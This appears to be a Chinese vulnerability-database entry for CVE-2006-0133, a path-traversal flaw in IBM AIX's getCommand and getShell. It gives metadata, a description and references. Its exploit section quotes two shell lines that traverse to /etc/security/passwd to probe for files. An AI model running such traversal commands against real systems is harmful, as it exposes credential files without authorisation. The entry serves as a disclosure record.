AIX getCommand和getShell命令信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109576 漏洞类型 路径遍历
发布时间 2005-12-30 更新时间 2006-01-15
CVE编号 CVE-2006-0133 CNNVD-ID CNNVD-200601-066
漏洞平台 AIX CVSS评分 3.6
|漏洞来源
https://www.exploit-db.com/exploits/26996
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-066
|漏洞详情
IBMAIX是一款商业性质的UNIX操作系统。在应用了最新补丁之后,AIX的getCommand和getShell命令中仍存在两个漏洞。攻击者可以通过特制命令判断是否存在某文件,或读取其没有权限的任意shell文档。
|漏洞EXP
source: http://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
|参考资料

来源:BID
名称:16103
链接:http://www.securityfocus.com/bid/16103
来源:BID
名称:16102
链接:http://www.securityfocus.com/bid/16102
来源:BUGTRAQ
名称:20060101[xfocus-SD-060101]AIXgetCommand&getShelltwovulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/420589/100/0/threaded
来源:SECTRACK
名称:1015429
链接:http://securitytracker.com/id?1015429